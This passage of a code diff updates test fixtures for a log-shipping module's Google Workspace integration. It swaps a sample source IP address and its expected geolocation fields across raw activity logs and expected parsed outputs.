+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1766,7 +1658,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}",
         "event.provider": "drive",
         "event.type": [
             "change"
@@ -1793,10 +1685,10 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 20815,
+        "log.offset": 20788,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
@@ -1804,17 +1696,13 @@
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log
index e67fe7571a3c..5014f5a7063a 100644
--- a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log
@@ -1,25 +1,25 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json
index 48cbd47cf05c..8db5f00f389a 100644
--- a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_permission\",\"parameters\":[{\"name\":\"acl_permission\",\"value\":\"can_add_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value_repeated\",\"multiValue\":[\"managers\",\"members\"]},{\"name\":\"old_value_repeated\",\"multiValue\":[\"managers\"]}]}}",
         "event.provider": "groups",
         "event.type": [
             "change",
@@ -34,23 +34,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -71,7 +67,7 @@
         "event.dataset": "google_workspace.groups",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}",
